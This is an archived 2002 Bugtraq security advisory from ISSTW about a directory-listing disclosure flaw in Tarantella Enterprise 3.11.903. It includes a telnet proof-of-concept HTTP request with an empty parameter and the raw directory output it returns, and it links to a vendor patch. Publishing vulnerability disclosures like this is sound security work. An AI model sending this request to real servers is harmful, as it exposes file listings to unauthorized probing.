[23977] in bugtraq

home help back first fref pref prev next nref lref last post

ISSTW Security Advisory Tarantella Enterprise 3.11.903 Directory Index Disclosure Vulnerability

daemon@ATHENA.MIT.EDU (advisory)
Thu Jan 24 16:34:02 2002

Date: Thu, 24 Jan 2002 15:33:02 +0800
From: advisory <advisory@isstw.com>
To: bugtraq@securityfocus.com
Message-Id: <20020124152832.0C22.ADVISORY@isstw.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="BIG5"
Content-Transfer-Encoding: 8bit

ISSTW Security Advisory (ISSTW200201)
Tarantella Enterprise 3.11.903 Directory Index Disclosure Vulnerability

Discovery Date: Fri, 21 Dec 2001
----------------------------------------------------------------------


Overview:
---------
ISSTW Tiger-Force discovered a vulnerability in Tarantella Enterprise 3
that will reveal directory content with the use of blank parameter.


Problem Description:
--------------------
Tarantella Enterprise 3 is a non-intrusive application/data centralization
solution. End users can access enterprise resources via the web interface.
The vulnerability will allow a malicious user to review the directory content.


Exploit:
--------
shell$ telnet tarantella.somewhere.com 80
Trying 12.34.56.78...
Connected to 12.34.56.78.
Escape character is '^]'.
GET /cgi-bin/ttawebtop.cgi/?action=start&pg= HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 21 Dec 2001 11:34:39 GMT
Server: Apache/1.3.4 (Unix)
Content-length: 512
Connection: close
Content-Type: text/html

  ?C  .    ¨º  ..    4    cgi-bin   ?E   direct.html
   on    examples      ?    
help      ?Y  
index.html    ?Z   index2.html   ?[  
kiosk.html    ?\   kiosk2.html   ?]   loader.html   %
  mac   -v   resources
native   5     java      ?w    index2.html.orig      
›o   modules   Îb    tsp les
x    resources.3_11.tar    ,w 
resources.old 


Tested Platform:
---------------
Tarantella Enterprise 3.11.903


Tested OS:
----------
Solaris 7 (Sparc)


Patch Information:
------------------
http://www.tarantella.com/security/bulletin-03.html


Credit:
-------
This vulnerability was discovered and researched by 
Chieh-Chun Lin (cclin@iss.com.tw)

Disclaimer:

All information in these advisories are subject to change without
any advanced notices neither mutual consensus, and each of them 
is released as it is. ISSTW. is not responsible for any risks of
occurrences caused by applying those information.
home help back first fref pref prev next nref lref last post